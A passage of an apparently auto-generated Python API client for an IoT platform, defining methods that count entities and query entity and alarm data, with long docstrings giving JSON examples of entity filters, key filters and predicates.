'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms the value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL. ## Filter Predicate The Filter Predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. The platform supports 4 predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows combining multiple operations over one filter key. 
Simple predicate example, to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example, to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` A more complex predicate example, to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with a more dynamic expression (for example, temperature > the value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to refer to an attribute of the tenant, customer or user that is performing the API call. See the example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as the 'sourceType'. The 'defaultValue' is used when the attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.count_entities_by_query_using_post(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param EntityCountQuery body:
        :return: int
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.count_entities_by_query_using_post_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.count_entities_by_query_using_post_with_http_info(**kwargs)  # noqa: E501
            return data
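A minimal sketch of assembling the request body for this endpoint. It mirrors the JSON shapes documented in the docstring above; passing a plain dict as `body` (instead of a typed `EntityCountQuery` model) is an assumption and may vary by client version.

```python
# Sketch (assumption, not part of the generated client): build the documented
# "count devices with attribute 'active' == true" query as a plain dict.

def build_active_device_count_query():
    """Query body that counts devices whose 'active' attribute is true."""
    return {
        "entityFilter": {"type": "entityType", "entityType": "DEVICE"},
        "keyFilters": [
            {
                "key": {"type": "ATTRIBUTE", "key": "active"},
                "valueType": "BOOLEAN",
                "predicate": {
                    "operation": "EQUAL",
                    "value": {"defaultValue": True, "dynamicValue": None},
                    "type": "BOOLEAN",
                },
            }
        ],
    }

# Hypothetical call, assuming a configured client instance named `api`:
# count = api.count_entities_by_query_using_post(body=build_active_device_count_query())
```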

    def count_entities_by_query_using_post_with_http_info(self, **kwargs):  # noqa: E501
        """Count Entities by Query  # noqa: E501

Allows running complex queries to search the count of platform entities (devices, assets, customers, etc) based on the combination of a main entity filter and multiple key filters. Returns the number of entities that match the query definition. # Query Definition The main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"find all devices related to asset 'Building A'\". Optional **key filters** allow filtering the results of the entity filter by complex criteria against main entity fields (name, label, type, etc), attributes and telemetry. For example, \"temperature > 20 or temperature < 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and timeseries field 'batteryLevel' > 40\". Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"ATTRIBUTE\", \"key\": \"active\" }, \"valueType\": \"BOOLEAN\", \"predicate\": { \"operation\": \"EQUAL\", \"value\": { \"defaultValue\": true, \"dynamicValue\": null }, \"type\": \"BOOLEAN\" } } ] } ``` The example above searches for all devices that have the attribute 'active' set to 'true'. Now let's review the available entity filter and key filter syntax: # Entity Filters The entity filter body depends on the 'type' parameter. Let's review the available entity filter types. In fact, they correspond to the available dashboard aliases. ## Single Entity Allows filtering only one entity, based on its id. For example, this entity filter selects a certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"DEVICE\" } } ``` ## Entity List Filter Allows filtering entities of the same type using their ids. 
For example, this entity filter selects two devices: ```json { \"type\": \"entityList\", \"entityType\": \"DEVICE\", \"entityList\": [ \"e6501f30-2a7a-11ec-94eb-213c95f54092\", \"e6657bf0-2a7a-11ec-94eb-213c95f54092\" ] } ``` ## Entity Name Filter Allows filtering entities of the same type using the **'starts with'** expression over the entity name. For example, this entity filter selects all devices whose name starts with 'Air Quality': ```json { \"type\": \"entityName\", \"entityType\": \"DEVICE\", \"entityNameFilter\": \"Air Quality\" } ``` ## Entity Type Filter Allows filtering entities based on their type (CUSTOMER, USER, DASHBOARD, ASSET, DEVICE, etc). For example, this entity filter selects all tenant customers: ```json { \"type\": \"entityType\", \"entityType\": \"CUSTOMER\" } ``` ## Asset Type Filter Allows filtering assets based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'charging station' assets whose name starts with 'Tesla': ```json { \"type\": \"assetType\", \"assetType\": \"charging station\", \"assetNameFilter\": \"Tesla\" } ``` ## Device Type Filter Allows filtering devices based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Temperature Sensor' devices whose name starts with 'ABC': ```json { \"type\": \"deviceType\", \"deviceType\": \"Temperature Sensor\", \"deviceNameFilter\": \"ABC\" } ``` ## Edge Type Filter Allows filtering edge instances based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Factory' edge instances whose name starts with 'Nevada': ```json { \"type\": \"edgeType\", \"edgeType\": \"Factory\", \"edgeNameFilter\": \"Nevada\" } ``` ## Entity View Filter Allows filtering entity views based on their type and the **'starts with'** expression over their name. 
For example, this entity filter selects all 'Concrete Mixer' entity views whose name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ``` ## Api Usage Filter Allows querying for Api Usage based on an optional customer id. If the customer id is not set, returns the current tenant API usage. For example, this entity filter selects the 'Api Usage' entity for the customer with id 'e6501f30-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"apiUsageState\", \"customerId\": { \"id\": \"d521edb0-2a7a-11ec-94eb-213c95f54092\", \"entityType\": \"CUSTOMER\" } } ``` ## Relations Query Filter Allows filtering entities that are related to the provided root entity. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'filters' object allows you to define the relation type and the set of acceptable entity types to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only those that match the 'filters'. For example, this entity filter selects all devices and assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092': ```json { \"type\": \"relationsQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"filters\": [ { \"relationType\": \"Contains\", \"entityTypes\": [ \"DEVICE\", \"ASSET\" ] } ] } ``` ## Asset Search Query Allows filtering assets that are related to the provided root entity. Filters related assets based on the relation type and a set of asset types. Possible direction values are 'TO' and 'FROM'. 
The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'assetTypes' defines the types of the assets to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only assets that match the 'relationType' and 'assetTypes' conditions. For example, this entity filter selects 'charging station' assets which are related to the asset with id 'e51de0c0-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"assetSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e51de0c0-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"assetTypes\": [ \"charging station\" ] } ``` ## Device Search Query Allows filtering devices that are related to the provided root entity. Filters related devices based on the relation type and a set of device types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'deviceTypes' defines the types of the devices to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only devices that match the 'relationType' and 'deviceTypes' conditions. 
For example, this entity filter selects 'Charging port' and 'Air Quality Sensor' devices which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"deviceSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"deviceTypes\": [ \"Air Quality Sensor\", \"Charging port\" ] } ``` ## Entity View Query Allows filtering entity views that are related to the provided root entity. Filters related entity views based on the relation type and a set of entity view types. Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'entityViewTypes' defines the types of the entity views to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only entity views that match the 'relationType' and 'entityViewTypes' conditions. For example, this entity filter selects 'Concrete mixer' entity views which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"entityViewSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 1, \"fetchLastLevelOnly\": false, \"relationType\": \"Contains\", \"entityViewTypes\": [ \"Concrete mixer\" ] } ``` ## Edge Search Query Allows filtering edge instances that are related to the provided root entity. Filters related edge instances based on the relation type and a set of edge types. 
Possible direction values are 'TO' and 'FROM'. The 'maxLevel' defines how many relation levels the query should search 'recursively'. Assuming the 'maxLevel' is > 1, the 'fetchLastLevelOnly' defines whether to return all related entities or only entities that are on the last level of relations. The 'relationType' defines the type of the relation to search for. The 'edgeTypes' defines the types of the edge instances to search for. The relation query calculates all related entities, even if they are filtered using different relation types, and then extracts only edge instances that match the 'relationType' and 'edgeTypes' conditions. For example, this entity filter selects 'Factory' edge instances which are related to the asset with id 'e52b0020-2a7a-11ec-94eb-213c95f54092' using the 'Contains' relation: ```json { \"type\": \"edgeSearchQuery\", \"rootEntity\": { \"entityType\": \"ASSET\", \"id\": \"e52b0020-2a7a-11ec-94eb-213c95f54092\" }, \"direction\": \"FROM\", \"maxLevel\": 2, \"fetchLastLevelOnly\": true, \"relationType\": \"Contains\", \"edgeTypes\": [ \"Factory\" ] } ``` # Key Filters A Key Filter allows you to define complex logical expressions over an entity field, attribute or latest time-series value. The filter is defined using 'key', 'valueType' and 'predicate' objects. A single entity query may have zero, one or multiple key filters. If multiple filters are defined, they are evaluated using a logical 'AND'. The example below checks that the temperature of the entity is above 20 degrees: ```json { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ``` Now let's review the 'key', 'valueType' and 'predicate' objects in detail. ## Filter Key A Filter Key defines either an entity field, an attribute or a telemetry key. It is a JSON object that consists of the key name and type. 
The following filter key types are supported: * 'CLIENT_ATTRIBUTE' - used for client attributes; * 'SHARED_ATTRIBUTE' - used for shared attributes; * 'SERVER_ATTRIBUTE' - used for server attributes; * 'ATTRIBUTE' - used for any of the above; * 'TIME_SERIES' - used for time-series values; * 'ENTITY_FIELD' - used for accessing entity fields like 'name', 'label', etc. The list of available fields depends on the entity type; * 'ALARM_FIELD' - similar to entity field, but is used in alarm queries only. Let's review the example: ```json { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ``` ## Value Type and Operations Provides a hint about the data type of the entity field that is defined in the filter key. The value type impacts the list of possible operations that you may use in the corresponding predicate. For example, you may use 'STARTS_WITH' or 'ENDS_WITH', but you can't use 'GREATER_OR_EQUAL' for string values. The following filter value types and corresponding predicate operations are supported: * 'STRING' - used to filter any 'String' or 'JSON' values. Operations: EQUAL, NOT_EQUAL, STARTS_WITH, ENDS_WITH, CONTAINS, NOT_CONTAINS; * 'NUMERIC' - used for 'Long' and 'Double' values. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL; * 'BOOLEAN' - used for boolean values. Operations: EQUAL, NOT_EQUAL; * 'DATE_TIME' - similar to numeric, transforms the value to milliseconds since epoch. Operations: EQUAL, NOT_EQUAL, GREATER, LESS, GREATER_OR_EQUAL, LESS_OR_EQUAL. ## Filter Predicate The Filter Predicate defines the logical expression to evaluate. The list of available operations depends on the filter value type, see above. The platform supports 4 predicate types: 'STRING', 'NUMERIC', 'BOOLEAN' and 'COMPLEX'. The last one allows combining multiple operations over one filter key. 
Simple predicate example, to check 'value < 100': ```json { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 100, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ``` Complex predicate example, to check 'value < 10 or value > 20': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 20, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ``` A more complex predicate example, to check 'value < 10 or (value > 50 && value < 60)': ```json { \"type\": \"COMPLEX\", \"operation\": \"OR\", \"predicates\": [ { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 10, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"type\": \"COMPLEX\", \"operation\": \"AND\", \"predicates\": [ { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 50, \"dynamicValue\": null }, \"type\": \"NUMERIC\" }, { \"operation\": \"LESS\", \"value\": { \"defaultValue\": 60, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } ] } ] } ``` You may also want to replace hardcoded values (for example, temperature > 20) with a more dynamic expression (for example, temperature > the value of the tenant attribute with key 'temperatureThreshold'). It is possible to use 'dynamicValue' to refer to an attribute of the tenant, customer or user that is performing the API call. See the example below: ```json { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\" } }, \"type\": \"NUMERIC\" } ``` Note that you may use 'CURRENT_USER', 'CURRENT_CUSTOMER' and 'CURRENT_TENANT' as the 'sourceType'. The 'defaultValue' is used when the attribute with such a name is not defined for the chosen source. Available for users with 'TENANT_ADMIN' or 'CUSTOMER_USER' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.count_entities_by_query_using_post_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param EntityCountQuery body:
        :return: int
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method count_entities_by_query_using_post" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        return self.api_client.call_api(
            '/api/entitiesQuery/count', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='int',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
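The predicate composition rules documented above (nested COMPLEX AND/OR predicates) can be sketched with small helpers. The helper names below are illustrative assumptions, not part of the generated client; only the emitted dict shapes come from the docstring.

```python
# Illustrative helpers (assumed names, not part of the generated client) for
# composing the NUMERIC and COMPLEX predicates documented above.

def numeric_predicate(operation, value, dynamic_value=None):
    """NUMERIC predicate, e.g. operation='GREATER', value=20."""
    return {
        "operation": operation,
        "value": {"defaultValue": value, "dynamicValue": dynamic_value},
        "type": "NUMERIC",
    }

def complex_predicate(operation, *predicates):
    """COMPLEX predicate; 'operation' is 'AND' or 'OR', nesting is allowed."""
    return {"type": "COMPLEX", "operation": operation, "predicates": list(predicates)}

# 'value < 10 or (value > 50 && value < 60)' from the docstring example:
example = complex_predicate(
    "OR",
    numeric_predicate("LESS", 10),
    complex_predicate(
        "AND",
        numeric_predicate("GREATER", 50),
        numeric_predicate("LESS", 60),
    ),
)
```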

    def find_alarm_data_by_query_using_post(self, **kwargs):  # noqa: E501
        """Find Alarms by Query  # noqa: E501

This method description defines how the Alarm Data Query extends the Entity Data Query. See the method 'Find Entity Data by Query' first to get info about the 'Entity Data Query'. The platform will first search for the entities that match the entity and key filters. Then, the platform will use the 'Alarm Page Link' to filter the alarms related to those entities. Finally, the platform fetches the alarm properties that are defined in the **'alarmFields'** and combines them with the other entity, attribute and latest time-series fields to return the result. See the example of the alarm query below. The query will search the first 100 active alarms with type 'Temperature Alarm' or 'Fire Alarm' for any device with current temperature > 0. The query will return a combination of the entity fields: name of the device, device model and latest temperature reading, and alarm fields: createdTime, type, severity and status: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"pageLink\": { \"page\": 0, \"pageSize\": 100, \"textSearch\": null, \"searchPropagatedAlarms\": false, \"statusList\": [ \"ACTIVE\" ], \"severityList\": [ \"CRITICAL\", \"MAJOR\" ], \"typeList\": [ \"Temperature Alarm\", \"Fire Alarm\" ], \"sortOrder\": { \"key\": { \"key\": \"createdTime\", \"type\": \"ALARM_FIELD\" }, \"direction\": \"DESC\" }, \"timeWindow\": 86400000 }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ], \"alarmFields\": [ { \"type\": \"ALARM_FIELD\", \"key\": \"createdTime\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"type\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"severity\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"status\" } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": 
\"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ] } ``` # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.find_alarm_data_by_query_using_post(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param AlarmDataQuery body:
        :return: PageDataAlarmData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.find_alarm_data_by_query_using_post_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.find_alarm_data_by_query_using_post_with_http_info(**kwargs)  # noqa: E501
            return data
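For orientation, the query payload documented above can be assembled as a plain Python dict before it is passed to the endpoint. The sketch below mirrors the docstring's example query; the helper name `build_alarm_query` is ours, not part of the generated client:

```python
# Sketch (not part of the generated client): the alarm query described in the
# docstring above -- first 100 active CRITICAL/MAJOR alarms of type
# 'Temperature Alarm' or 'Fire Alarm' for devices with temperature > 0.
def build_alarm_query(page_size=100):
    return {
        "entityFilter": {"type": "entityType", "resolveMultiple": True,
                         "entityType": "DEVICE"},
        "pageLink": {
            "page": 0, "pageSize": page_size, "textSearch": None,
            "searchPropagatedAlarms": False,
            "statusList": ["ACTIVE"],
            "severityList": ["CRITICAL", "MAJOR"],
            "typeList": ["Temperature Alarm", "Fire Alarm"],
            "sortOrder": {"key": {"key": "createdTime", "type": "ALARM_FIELD"},
                          "direction": "DESC"},
            "timeWindow": 86400000,  # last 24 hours, in milliseconds
        },
        "keyFilters": [{
            "key": {"type": "TIME_SERIES", "key": "temperature"},
            "valueType": "NUMERIC",
            "predicate": {"operation": "GREATER",
                          "value": {"defaultValue": 0, "dynamicValue": None},
                          "type": "NUMERIC"},
        }],
        # Alarm properties to fetch, combined with entity fields below.
        "alarmFields": [{"type": "ALARM_FIELD", "key": k}
                        for k in ("createdTime", "type", "severity", "status")],
        "entityFields": [{"type": "ENTITY_FIELD", "key": "name"}],
        "latestValues": [{"type": "ATTRIBUTE", "key": "model"},
                         {"type": "TIME_SERIES", "key": "temperature"}],
    }
```

A dict like this can then be supplied as the `body` keyword of `find_alarm_data_by_query_using_post`.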

    def find_alarm_data_by_query_using_post_with_http_info(self, **kwargs):  # noqa: E501
"""Find Alarms by Query # noqa: E501
This method description defines how Alarm Data Query extends the Entity Data Query. See method 'Find Entity Data by Query' first to get the info about 'Entity Data Query'. The platform will first search the entities that match the entity and key filters. Then, the platform will use 'Alarm Page Link' to filter the alarms related to those entities. Finally, platform fetch the properties of alarm that are defined in the **'alarmFields'** and combine them with the other entity, attribute and latest time-series fields to return the result. See example of the alarm query below. The query will search first 100 active alarms with type 'Temperature Alarm' or 'Fire Alarm' for any device with current temperature > 0. The query will return combination of the entity fields: name of the device, device model and latest temperature reading and alarms fields: createdTime, type, severity and status: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"pageLink\": { \"page\": 0, \"pageSize\": 100, \"textSearch\": null, \"searchPropagatedAlarms\": false, \"statusList\": [ \"ACTIVE\" ], \"severityList\": [ \"CRITICAL\", \"MAJOR\" ], \"typeList\": [ \"Temperature Alarm\", \"Fire Alarm\" ], \"sortOrder\": { \"key\": { \"key\": \"createdTime\", \"type\": \"ALARM_FIELD\" }, \"direction\": \"DESC\" }, \"timeWindow\": 86400000 }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": null }, \"type\": \"NUMERIC\" } } ], \"alarmFields\": [ { \"type\": \"ALARM_FIELD\", \"key\": \"createdTime\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"type\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"severity\" }, { \"type\": \"ALARM_FIELD\", \"key\": \"status\" } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": 
\"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ] } ``` # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.find_alarm_data_by_query_using_post_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param AlarmDataQuery body:
        :return: PageDataAlarmData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method find_alarm_data_by_query_using_post" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/alarmsQuery/find', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageDataAlarmData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
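The `call_api` invocation above reduces to a single authenticated POST. The sketch below shows the equivalent raw request, assuming a hypothetical host and JWT token; the path, verb, headers and 'X-Authorization' setting mirror the arguments passed to `call_api`:

```python
import json

# Hypothetical connection details -- replace with your real host and a JWT
# token obtained from the platform's login endpoint.
BASE_URL = "https://thingsboard.example.com"
JWT_TOKEN = "my-jwt-token"

def prepare_alarm_query_request(query):
    """Build the URL, headers and body that api_client.call_api would send."""
    url = BASE_URL + "/api/alarmsQuery/find"
    headers = {
        "Accept": "application/json",               # select_header_accept
        "Content-Type": "application/json",         # select_header_content_type
        "X-Authorization": "Bearer " + JWT_TOKEN,   # auth_settings
    }
    return url, headers, json.dumps(query)

# To actually send it (requires the `requests` package and a live server):
# import requests
# url, headers, body = prepare_alarm_query_request(my_query)
# page = requests.post(url, headers=headers, data=body).json()  # PageDataAlarmData
```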

    def find_entity_data_by_query_using_post(self, **kwargs):  # noqa: E501
        """Find Entity Data by Query  # noqa: E501

        Allows to run complex queries over platform entities (devices, assets, customers, etc.) based on the combination of the main entity filter and multiple key filters. Returns the paginated result of the query that contains the requested entity fields and latest values of the requested attributes and time-series data. # Query Definition The main **entity filter** is mandatory and defines generic search criteria. For example, \"find all devices with profile 'Moisture Sensor'\" or \"find all devices related to asset 'Building A'\". Optional **key filters** allow to filter the results of the **entity filter** by complex criteria against main entity fields (name, label, type, etc.), attributes and telemetry. For example, \"temperature > 20 or temperature < 10\" or \"name starts with 'T', and attribute 'model' is 'T1000', and time-series field 'batteryLevel' > 40\". The **entity fields** and **latest values** contain the lists of entity fields and latest attribute/telemetry fields to fetch for each entity. The **page link** contains information about the page to fetch and the sort ordering.
        Let's review the example: ```json { \"entityFilter\": { \"type\": \"entityType\", \"resolveMultiple\": true, \"entityType\": \"DEVICE\" }, \"keyFilters\": [ { \"key\": { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" }, \"valueType\": \"NUMERIC\", \"predicate\": { \"operation\": \"GREATER\", \"value\": { \"defaultValue\": 0, \"dynamicValue\": { \"sourceType\": \"CURRENT_USER\", \"sourceAttribute\": \"temperatureThreshold\", \"inherit\": false } }, \"type\": \"NUMERIC\" } } ], \"entityFields\": [ { \"type\": \"ENTITY_FIELD\", \"key\": \"name\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"label\" }, { \"type\": \"ENTITY_FIELD\", \"key\": \"additionalInfo\" } ], \"latestValues\": [ { \"type\": \"ATTRIBUTE\", \"key\": \"model\" }, { \"type\": \"TIME_SERIES\", \"key\": \"temperature\" } ], \"pageLink\": { \"page\": 0, \"pageSize\": 10, \"sortOrder\": { \"key\": { \"key\": \"name\", \"type\": \"ENTITY_FIELD\" }, \"direction\": \"ASC\" } } } ``` The example above searches for all devices whose latest 'temperature' reading is greater than the value of the current user's 'temperatureThreshold' attribute (or the default value 0 if that attribute is not set), and fetches their 'name', 'label' and 'additionalInfo' entity fields together with the latest 'model' attribute and 'temperature' reading. Now let's review the available entity filter and key filter syntax: # Entity Filters The entity filter body depends on the 'type' parameter. Let's review the available entity filter types. In fact, they correspond to the available dashboard aliases. ## Single Entity Allows to filter only one entity based on the id. For example, this entity filter selects a certain device: ```json { \"type\": \"singleEntity\", \"singleEntity\": { \"id\": 